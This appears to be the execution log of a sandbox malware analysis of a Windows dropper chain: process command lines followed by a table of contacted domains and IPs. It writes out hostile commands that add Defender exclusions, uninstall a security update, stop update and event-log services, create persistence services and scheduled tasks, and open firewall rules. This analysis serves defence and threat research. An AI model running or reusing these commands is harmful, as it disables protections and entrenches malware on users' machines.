C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3604 -ip 3604
C:\Users\Admin\AppData\Local\Temp\1000115001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\toolspub1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5220 -ip 5220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3604 -ip 3604
C:\Users\Admin\AppData\Local\Temp\nsz59C1.tmp
C:\Users\Admin\AppData\Local\Temp\nsz59C1.tmp
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5572 -ip 5572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 748
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff98ff69758,0x7ff98ff69768,0x7ff98ff69778
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 768
C:\Users\Admin\AppData\Local\Temp\670F.exe
C:\Users\Admin\AppData\Local\Temp\670F.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9900b3cb8,0x7ff9900b3cc8,0x7ff9900b3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3604 -ip 3604
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Users\Admin\AppData\Local\Temp\1000117001\rty27.exe
"C:\Users\Admin\AppData\Local\Temp\1000117001\rty27.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 776
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\GuardFox\ylbNv2I6pJRyyq2Z6jo0C555.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2000 -ip 2000
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 2076
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1940,i,12215155624733907021,2662966028111712042,131072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 --field-trial-handle=1940,i,12215155624733907021,2662966028111712042,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 --field-trial-handle=1940,i,12215155624733907021,2662966028111712042,131072 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1940,i,12215155624733907021,2662966028111712042,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1940,i,12215155624733907021,2662966028111712042,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1000119001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000119001\FirstZ.exe"
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,9021328556792048226,16394554489367339773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 932
C:\Users\Admin\AppData\Local\Temp\8E9D.exe
C:\Users\Admin\AppData\Local\Temp\8E9D.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 924
C:\Users\Admin\AppData\Local\Temp\is-D6B7G.tmp\8E9D.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D6B7G.tmp\8E9D.tmp" /SL5="$7032A,6135014,54272,C:\Users\Admin\AppData\Local\Temp\8E9D.exe"
C:\Users\Admin\Documents\GuardFox\qemu-ga.exe
"C:\Users\Admin\Documents\GuardFox\qemu-ga.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 2360 -ip 2360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 728
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\99D9.exe
C:\Users\Admin\AppData\Local\Temp\99D9.exe
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\A592.exe
C:\Users\Admin\AppData\Local\Temp\A592.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1788 -ip 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 372
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\A9C9.exe
C:\Users\Admin\AppData\Local\Temp\A9C9.exe
C:\Users\Admin\AppData\Local\Temp\ACC8.exe
C:\Users\Admin\AppData\Local\Temp\ACC8.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\B70A.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\B70A.dll
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Users\Admin\AppData\Local\Temp\1000113001\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\1000113001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4212 -ip 4212
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 360
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7012 -ip 7012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7012 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 396
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4212 -ip 4212
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /im chrome.exe /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6280 -ip 6280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 2556
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsz59C1.tmp" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7012 -ip 7012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7012 -s 1076
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 848
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4212 -ip 4212
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4212 -ip 4212
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Users\Admin\AppData\Roaming\ajcrvse
C:\Users\Admin\AppData\Roaming\ajcrvse
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5732 -ip 5732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 380
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4212 -ip 4212
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4212 -ip 4212
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4212 -ip 4212
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4212 -ip 4212
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4212 -ip 4212
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4212 -ip 4212
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4212 -ip 4212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4212 -ip 4212
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4212 -ip 4212
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ivd580.com | udp |
| US | 188.114.97.2:443 | ivd580.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | 294self-limited.sbs | udp |
| US | 104.21.15.216:80 | ok.spartabig.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| FI | 109.107.182.40:80 | 109.107.182.40 | tcp |
| AT | 5.42.64.33:80 | 5.42.64.33 | tcp |
| US | 188.114.97.2:80 | 294self-limited.sbs | tcp |
| US | 188.114.97.2:80 | 294self-limited.sbs | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 188.114.97.2:443 | 294self-limited.sbs | tcp |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| MX | 187.134.62.216:80 | cczhk.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
